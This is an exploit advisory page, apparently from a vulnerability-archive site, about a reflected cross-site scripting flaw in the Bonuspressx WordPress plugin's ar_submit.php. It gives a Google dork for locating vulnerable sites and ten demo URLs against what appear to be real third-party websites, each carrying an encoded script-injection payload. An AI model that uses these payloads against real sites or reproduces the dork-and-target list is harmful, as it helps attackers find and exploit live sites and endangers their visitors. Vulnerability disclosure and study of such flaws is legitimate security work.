Wordpress Bonuspressx Plugin Cross Site Scripting

2014.05.13
Credit: Ashiyane Digital Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################ [+] Exploit Title : Wordpress Bonuspressx Plugin Cross Site Scripting [+] Exploit Author : Ashiyane Digital Security Team [+] Vendor Homepage : http://wordpress.org [+] Google Dork : inurl:/wp-content/plugins/bonuspressx [+] Date : 2014-04-23 [+] Tested on : Windows 7 , Mozilla FireFox ############################################ [+] Exploit : Cross Site Scripting [+] Location : [Target]/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=[XSS] ############################################ [+] Demo : # http://mXegabon.us/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://dXsimple.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://caXchkiemtienonline.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://mXarkcall.com/bonus/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://onlXCinekarrier.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://imhXoangtram.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://imXakingmoney.net/blog/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://seXnukeinferno.com//wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://eXmarky.net/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # http://viraloXptins.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E ############################################ Discovered By : Milad Hacking & Cyber Injector We Love Mohammad Mail : milad.hacking.blackhat@gmail.com Home Page : https://www.facebook.com/milad.hacking.5 ############################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top